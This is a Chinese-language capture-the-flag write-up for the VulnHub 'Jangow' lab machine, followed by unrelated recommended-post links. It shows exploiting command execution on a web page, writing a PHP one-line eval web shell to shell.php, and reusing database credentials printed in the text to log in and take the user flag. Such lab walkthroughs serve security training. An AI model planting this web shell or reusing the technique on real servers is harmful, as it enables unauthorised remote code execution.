VulnHub JANGOW

提示(主机ip分配问题)

因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口,查看一下80端口

80端口:

检查页面后发现Buscar页面有个可疑的地方:

试下,有命令执行

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行,看到有shell.php,说明上传成功

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

拿到了user_flag

相关推荐
Whoami!几秒前
⸢ 拾陆-V⸥⤳ 安全数智化建设:安全智能平台(上)▸概述
网络安全·信息安全·ai安全
@CLoudbays_Martin119 分钟前
钓鱼网站应该怎么判断?
服务器·网络·安全
傻啦嘿哟16 分钟前
Python将Excel工作表转换为PDF:从入门到实战
python·pdf·excel
老鱼说AI29 分钟前
BPE编码从零开始实现pytorch
开发语言·人工智能·python·机器学习·chatgpt·nlp·gpt-3
LCG元34 分钟前
Linux 信号(Signals)机制详解:如何优雅地关闭你的进程?
linux
陳陈陳37 分钟前
AIGC 时代,用自然语言操作数据库:SQLite + LLM 的轻量级实践
前端·数据库·python
林炳然1 小时前
Python-Basic Day-4 函数-基础知识
python
FreeCode1 小时前
LangSmith Studio 调试智能体
python·langchain·agent
Paraverse_徐志斌1 小时前
基于 PyTorch + BERT 意图识别与模型微调
人工智能·pytorch·python·bert·transformer
梁正雄1 小时前
linux服务-Nginx+Tomcat+Redis之Session 共享
linux·nginx·tomcat